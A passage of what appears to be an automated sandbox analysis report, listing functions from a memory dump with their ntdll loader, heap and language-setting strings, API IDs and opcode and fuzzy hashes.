                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FFA121
                                                            • Failed to allocated memory for shimmed module list, xrefs: 00FFA10F
                                                            • LdrpCheckModule, xrefs: 00FFA117
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-161242083
                                                            • Opcode ID: 377e4dd998f4f37979a8202122574210da44cb0d7b8d1535d5fa5c50ac85ff1b
                                                            • Instruction ID: deef07e6e16841bcd049574a23eb70617fe9d38759a2564e7a3f74c48d06cd48
                                                            • Opcode Fuzzy Hash: 377e4dd998f4f37979a8202122574210da44cb0d7b8d1535d5fa5c50ac85ff1b
                                                            • Instruction Fuzzy Hash: 3A71E1B1E002059BCB24DF69C881ABEB7B0FF44714F154129E885DB251EB39AD41EB51
                                                            Function 00FA0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-1334570610
                                                            • Opcode ID: 146d9767f02d535eb6d71b6f683e0241084402cd6253851bf287c9a523de8e19
                                                            • Instruction ID: 637692522340397741fa3a3397f8e07d655a453772260859876b4d59f8b1ebd2
                                                            • Opcode Fuzzy Hash: 146d9767f02d535eb6d71b6f683e0241084402cd6253851bf287c9a523de8e19
                                                            • Instruction Fuzzy Hash: BD610571600305DFDB28CF28D540B6ABBE2FF46754F148459E585CF292CB74E841EB91
                                                            Function 00FCC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 010082E8
                                                            • Failed to reallocate the system dirs string !, xrefs: 010082D7
                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 010082DE
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1783798831
                                                            • Opcode ID: 099ddab9f4546539ed40276f877360e5f7d3053b347cbf570d681aecfa8f0080
                                                            • Instruction ID: c4c8c4f0bd06cb9e6d109a475ca9422846222b830f99e56602ee8d4a35e2d2f6
                                                            • Opcode Fuzzy Hash: 099ddab9f4546539ed40276f877360e5f7d3053b347cbf570d681aecfa8f0080
                                                            • Instruction Fuzzy Hash: 8041D1B1908301ABD721EB68DD46B5B77E8EF88710F04452AF9C8D7291E779D800AB92
                                                            Function 0104C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0104C1C5
                                                            • @, xrefs: 0104C1F1
                                                            • PreferredUILanguages, xrefs: 0104C212
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                            • API String ID: 0-2968386058
                                                            • Opcode ID: 549b2e1f35e4a6b6c28e3af0e3a70e8c69a20bafba472667dd346486d48895a0
                                                            • Instruction ID: 68bec94f537600ada935a4ee31df1a1918c88b8ca83d17046a03871a5eaef589
                                                            • Opcode Fuzzy Hash: 549b2e1f35e4a6b6c28e3af0e3a70e8c69a20bafba472667dd346486d48895a0
                                                            • Instruction Fuzzy Hash: 954166B1E01209EBEB51DED8CE81FEEB7F9AB54700F14407AE645B7240E7B49E449B50
                                                            Function 01024144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                            • API String ID: 0-1373925480
                                                            • Opcode ID: f255ae004f7f565b60c779fe537c4b058c5eac00bd8543073d10b5f345ac9536
                                                            • Instruction ID: 251b60eda7646e233f09f8e0cddd528cce2bea09e1629a3eec15e2157ea16925
                                                            • Opcode Fuzzy Hash: f255ae004f7f565b60c779fe537c4b058c5eac00bd8543073d10b5f345ac9536
                                                            • Instruction Fuzzy Hash: 9D41E571A04268CBEB22DBD9C840BADBBF4EF56340F24049AE981EB782D7748905CB11
                                                            Function 01014755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrpCheckRedirection, xrefs: 0101488F
                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01014888
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01014899
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                            • API String ID: 0-3154609507
                                                            • Opcode ID: 9f5cf4db4dbf223d24c2fba6bf8678be4f152e77e55e51e269d3edfc4d77f1fc
                                                            • Instruction ID: 6d80e97f5d674ec438b4003864998ce6d062725e4d06a4d7ba6256e75e390a1b
                                                            • Opcode Fuzzy Hash: 9f5cf4db4dbf223d24c2fba6bf8678be4f152e77e55e51e269d3edfc4d77f1fc
                                                            • Instruction Fuzzy Hash: 9741D372A043518FCB61DE5CD840A2A7BE4FF49B50F0905A9EDC9D7369D339D800CB81
                                                            Function 010120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrpInitializationFailure, xrefs: 010120FA
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01012104
                                                            • Process initialization failed with status 0x%08lx, xrefs: 010120F3
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2986994758
                                                            • Opcode ID: df53cd2c6445c15af35cc40c71264cfd9be27cec90a805841a23c7a90d364541
                                                            • Instruction ID: 85804fcacd5142d81df05847c3a3fb36953dd4bcd8944cc4d1c3df03d62eb0fb
                                                            • Opcode Fuzzy Hash: df53cd2c6445c15af35cc40c71264cfd9be27cec90a805841a23c7a90d364541
                                                            • Instruction Fuzzy Hash: 35F02834640308ABE720E60CDC43F993BA8FB81B04F200056F7C47B2C5D1B5E540D642
                                                            Function 00FA03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: #%u
                                                            • API String ID: 48624451-232158463
                                                            • Opcode ID: 61bb4bbd4c4fbcaf95e8fe3d630087966d2cbc8387709fb6562dcf4474051a11
                                                            • Instruction ID: 1d446f5c73e9c530df41febe33d33a8018520db8d1f3207bae6f5fc900283bc0
                                                            • Opcode Fuzzy Hash: 61bb4bbd4c4fbcaf95e8fe3d630087966d2cbc8387709fb6562dcf4474051a11
                                                            • Instruction Fuzzy Hash: 96715BB1A0014A9FDB01DFA8D981BAEB7F8BF08714F144065FA05E7251EA38EE41DB60
                                                            Function 00F9A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrResSearchResource Exit, xrefs: 00F9AA25
                                                            • LdrResSearchResource Enter, xrefs: 00F9AA13
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                            • API String ID: 0-4066393604
                                                            • Opcode ID: 934f2de898724d47b20f53e9a75f52da080ccefc2db5ee936f47b919a221a8b4
                                                            • Instruction ID: 6e4c98b18f145b5b202ae22da91e80ec9400bc8c38355408c8e8ce6990345c78
                                                            • Opcode Fuzzy Hash: 934f2de898724d47b20f53e9a75f52da080ccefc2db5ee936f47b919a221a8b4
                                                            • Instruction Fuzzy Hash: BFE16F72E00219DBEF21DE99C980BBEB7B9AF54324F244026F901E7291D778DD41EB91
                                                            Function 0105A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `$`
                                                            • API String ID: 0-197956300
                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                            • Instruction ID: c056f47090cd751f66a81b01b70eda0172e1a0bff580f5ec49039bb5444ccad4
                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                            • Instruction Fuzzy Hash: DDC1BE31304346DBEBA5CE28C841B6BBBE5AFC8318F084A2DFAD58B291D775D505CB51
                                                            Function 0100E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Legacy$UEFI
                                                            • API String ID: 2994545307-634100481
                                                            • Opcode ID: 0e7c19daf36dafa43eea538c5940f8c7a8883c9b17b1e3967de784dc8ead24b6
                                                            • Instruction ID: 8b62f58e792598ab9dfc37a1826fb57d320cfde3af97c70ea379c650364a7b3e
                                                            • Opcode Fuzzy Hash: 0e7c19daf36dafa43eea538c5940f8c7a8883c9b17b1e3967de784dc8ead24b6
                                                            • Instruction Fuzzy Hash: 87615D71E047189FEB25DFA8C841BADBBF9FB44700F14446EE689EB291D731AA00DB50
                                                            Function 010343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$MUI
                                                            • API String ID: 0-17815947
                                                            • Opcode ID: 4a2ee9e48f8d7e5368c472783c9f7442fefeb2af3c13732cb012ea8e20b43dfc
                                                            • Instruction ID: 77bb4c11913fb5f25f449e46a918c0dafd43c9e2d0c218743cd1aee288bc8845
                                                            • Opcode Fuzzy Hash: 4a2ee9e48f8d7e5368c472783c9f7442fefeb2af3c13732cb012ea8e20b43dfc
                                                            • Instruction Fuzzy Hash: F15149B1E0021DAEDB11DFA9CC81AEEBBBDEB44754F14052AF641FB281D7349905CBA0
                                                            Function 00F904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • kLsE, xrefs: 00F90540
                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F9063D
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                            • API String ID: 0-2547482624
                                                            • Opcode ID: 01d3b2398825fc54b8b44247c0457a068ace3bf14691c8776f00cf32ae8af22a
                                                            • Instruction ID: 9f193f78a51fb15cf2fd26c1025ca8fc8bcf9b0b58e1eabeada408f3d07d3fe8
                                                            • Opcode Fuzzy Hash: 01d3b2398825fc54b8b44247c0457a068ace3bf14691c8776f00cf32ae8af22a
                                                            • Instruction Fuzzy Hash: EC5103719047468FEB24EF65C4407A7B7E5AF84314F04483EEADA87241EB34E945DF92
                                                            Function 00F9A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 00F9A309
                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 00F9A2FB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                            • API String ID: 0-2876891731
                                                            • Opcode ID: 23d3dc4b9f443a9cdabfcb2fa3d45909543f35ea63bbaf06a6a662ca6ae779bf
                                                            • Instruction ID: 4c7b2dc63241582fecaee3849c40079bcb788cd35b2f63c4ada9682ff074c395
                                                            • Opcode Fuzzy Hash: 23d3dc4b9f443a9cdabfcb2fa3d45909543f35ea63bbaf06a6a662ca6ae779bf
                                                            • Instruction Fuzzy Hash: 0E41AE31A04649DBEB21CF59C840F69B7B4FF85714F2440A9EE00DB2A1E37AD900EB91
                                                            Function 00FCA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Cleanup Group$Threadpool!
                                                            • API String ID: 2994545307-4008356553
                                                            • Opcode ID: 600d447a753f87393c1724313cb6ef47c9fefe6e48432509039f8ed70be79854
                                                            • Instruction ID: a18efab84a46fc4e0e928c2bf8571b75c8e96903accecca5f61b0359dfad7ede
                                                            • Opcode Fuzzy Hash: 600d447a753f87393c1724313cb6ef47c9fefe6e48432509039f8ed70be79854
                                                            • Instruction Fuzzy Hash: 0301D1B2254748AFD311DF14CE46F1677E8E744B19F05893DB588C7190E739E804EB4A
                                                            Function 00F9C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: MUI
                                                            • API String ID: 0-1339004836
                                                            • Opcode ID: 612e8bdaedea7fa6a95c3037ab1042e1b9b47afc30e5793d42689667af2326aa
                                                            • Instruction ID: 0845a92bbb89728d7f18b64a2bf0a558656ab1919f951a035edefd7f6823c1ed
                                                            • Opcode Fuzzy Hash: 612e8bdaedea7fa6a95c3037ab1042e1b9b47afc30e5793d42689667af2326aa
                                                            • Instruction Fuzzy Hash: 9E823C75E002189FEF24CFA9C980BADB7B5BF48710F24816AE859AB351D7349D41EF90
                                                            Function 01016420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 75138650a7e46ae8f4f598aed8d2badb9d45d3f2f7abfeba396260242bdc0ab6
                                                            • Instruction ID: b25c1292c728ceac90856084615147b217ea31a1896b1a4c0b834cbe16a6320e
                                                            • Opcode Fuzzy Hash: 75138650a7e46ae8f4f598aed8d2badb9d45d3f2f7abfeba396260242bdc0ab6
                                                            • Instruction Fuzzy Hash: 3C9183B1A40219AFDB21DB95CC85FEEBBB9EF08B50F140055F600AB195DB79AD00DBA0
                                                            Function 0103E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 955a37de0b45aaed5cf274ad7ee5e580db3a383438cb5df633d9efb8b8c346ab
                                                            • Instruction ID: 72b5ccf8b6268ea239c9797b727e9dc28b30a6d10705e2674bbc9aec0cc9e1bf
                                                            • Opcode Fuzzy Hash: 955a37de0b45aaed5cf274ad7ee5e580db3a383438cb5df633d9efb8b8c346ab
                                                            • Instruction Fuzzy Hash: BA91CE71900609BFDB22ABA4DC85FEFBBBEEF85740F100129F541A7251DB39A901DB90
                                                            Function 00FCA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: GlobalTags
                                                            • API String ID: 0-1106856819
                                                            • Opcode ID: 323f02650625a63158617288825d6552b868a2d8e7ec0c0552ee9604f84536d9
                                                            • Instruction ID: 04846a35506d98706317e206d8e871d329e1c5b15ebb5307c930b079b4020cbb
                                                            • Opcode Fuzzy Hash: 323f02650625a63158617288825d6552b868a2d8e7ec0c0552ee9604f84536d9
                                                            • Instruction Fuzzy Hash: 4B7192B5E0021ACFEF69CF98C5906EDBBF2BF48710F14816EE485A7281E7369911CB50
                                                            Function 01034978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .mui
                                                            • API String ID: 0-1199573805
                                                            • Opcode ID: b8c663825b18566e919c4fd6186619bc7836356b8b982a57c0a673a52686316b
                                                            • Instruction ID: bc9b914d0862e1e7a44b7f03ab70f60a7b9233e0000ca47460d1a37ef8a13d7f
                                                            • Opcode Fuzzy Hash: b8c663825b18566e919c4fd6186619bc7836356b8b982a57c0a673a52686316b
                                                            • Instruction Fuzzy Hash: 4751D572D006299BDF14DF99C840AEEBBB8AF44B14F05416AFA51FF240D3389D02CBA4
                                                            Function 00FAE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: EXT-
                                                            • API String ID: 0-1948896318
                                                            • Opcode ID: 9e2710d4813701377689950c874223665ff188782f0d0cf59416bab18ea0a209
                                                            • Instruction ID: 3fee12a91cb3c7fcaafb1a41a32fa3a0f2cac465b1368d4bcba2e204a7ea2806
                                                            • Opcode Fuzzy Hash: 9e2710d4813701377689950c874223665ff188782f0d0cf59416bab18ea0a209
                                                            • Instruction Fuzzy Hash: DB4191B2908311ABD710DA75CD41B6BB7E8AF89B14F44092DF994E7280E778DD04E793
                                                            Function 0100C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: BinaryHash
                                                            • API String ID: 0-2202222882
                                                            • Opcode ID: 71eb051280a7beee45fdf823209c7ac9d33edcfb54fd02f15a5acff1416e690e
                                                            • Instruction ID: fb083472e2faecd7792654ab149be1877770ef9f3a97cb1fedd4e81b930dd802
                                                            • Opcode Fuzzy Hash: 71eb051280a7beee45fdf823209c7ac9d33edcfb54fd02f15a5acff1416e690e
                                                            • Instruction Fuzzy Hash: 8641A6B1D0012CABEB21DA50CD85FDEB77DAB44714F0046E5AA48AB181DB709F888F98
                                                            Function 01026B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #
                                                            • API String ID: 0-1885708031
                                                            • Opcode ID: e7207e6cd2034f2f9330be11aa4026c9a91f9936db94605a0c573bb7e268dfd6
                                                            • Instruction ID: e3fba262a7e2f5e209a15c80e0f058060cde67806c7326fedb18cbdd329bedb1
                                                            • Opcode Fuzzy Hash: e7207e6cd2034f2f9330be11aa4026c9a91f9936db94605a0c573bb7e268dfd6
                                                            • Instruction Fuzzy Hash: 8F311A31A0076C9BDB22EB69CC54BFE7BE8DF05704F644069ED81AB282C776E805CB50
                                                            Function 0101892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0101895E
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                            • API String ID: 0-702105204
                                                            • Opcode ID: 8e8922844dc0a6867d6749c4fbb334a3eb794f3c5ecc785e866c8ee56cefa370
                                                            • Instruction ID: b930e1cb56d3df86943825306b36b1b27be93a103289e842f0b8c148569dae3d
                                                            • Opcode Fuzzy Hash: 8e8922844dc0a6867d6749c4fbb334a3eb794f3c5ecc785e866c8ee56cefa370
                                                            • Instruction Fuzzy Hash: 59012B323042009BE6247F59CC84A6E7BA6EF827A4F0C006EF6C10755ACF2DA980D796
                                                            Function 01032000 Relevance: .8, Instructions: 757COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15e62fc337d12cd03167513d90c1b55be0a6da3cdf0fe8787f3bb0b7e8efb7b4
                                                            • Instruction ID: 9d7352e849b17bad070363fe1fb028ec6468fced6336f03b22017bd649bb73e8
                                                            • Opcode Fuzzy Hash: 15e62fc337d12cd03167513d90c1b55be0a6da3cdf0fe8787f3bb0b7e8efb7b4
                                                            • Instruction Fuzzy Hash: 4642DF366083019BE765CF68C890A6FBBE9BFC8700F08496EFAC297251D735D945CB52
                                                            Function 01028158 Relevance: .6, Instructions: 617COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 55fe6b6fb3cf29871f5b8683adc7eeca070e175b05907ea590fb2587c7a51430
                                                            • Instruction ID: 236133211ba14ee4321d5032f69ea45ee8c7a8255b4f4ce01fd1314fa85eec93
                                                            • Opcode Fuzzy Hash: 55fe6b6fb3cf29871f5b8683adc7eeca070e175b05907ea590fb2587c7a51430
                                                            • Instruction Fuzzy Hash: 2C424F75A002299FEB64CF69CC41BADBBF5BF49300F14C19AE989EB242D7349985CF50
                                                            Function 00FA2840 Relevance: .6, Instructions: 605COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bed5afbf7235ab0e3702399c4b76b875b29d018cb9c73fef506360ecf7f6d501
                                                            • Instruction ID: 6f8e7ac10a0d98b1b11a17862260b2b38f5b7c3c940d4811f094a85798547868
                                                            • Opcode Fuzzy Hash: bed5afbf7235ab0e3702399c4b76b875b29d018cb9c73fef506360ecf7f6d501
                                                            • Instruction Fuzzy Hash: 9132FE70A007598BDB24DF69C8447BEBBF2BF85714F24411DE586DB2A4DB35AC02EB50
                                                            Function 0103A118 Relevance: .6, Instructions: 591COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7e3b519e83ffe0c4672a6fe1fab9733cb8b2f29255b68d56a0828d4638606eb1
                                                            • Instruction ID: f1971672b9efd9e4e189d0ea9605f6adee8e6ffde52667a2218f34134983966c
                                                            • Opcode Fuzzy Hash: 7e3b519e83ffe0c4672a6fe1fab9733cb8b2f29255b68d56a0828d4638606eb1
                                                            • Instruction Fuzzy Hash: 0122AD74304661CBEB65CF2DC494776BBE9AFC9300F08849AE9C6CB286D739D452DB60
